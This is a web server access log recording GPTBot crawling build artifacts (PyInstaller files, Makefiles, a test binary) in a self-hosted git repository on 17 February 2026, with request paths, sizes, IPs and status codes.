"/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 26804] [Gzip 20.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:15:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51205] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10945] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs" -[17/Feb/2026:15:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:15:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16921] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 33418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:15:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16922] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:15:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21837] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73577] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14336] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24015] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:15:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:15:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11072] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:15:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:15:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10938] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:15:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 28084] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:15:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21649] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10775] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:15:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10781] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:15:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10936] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:15:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 22086] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:15:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:15:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:03:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:15:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr 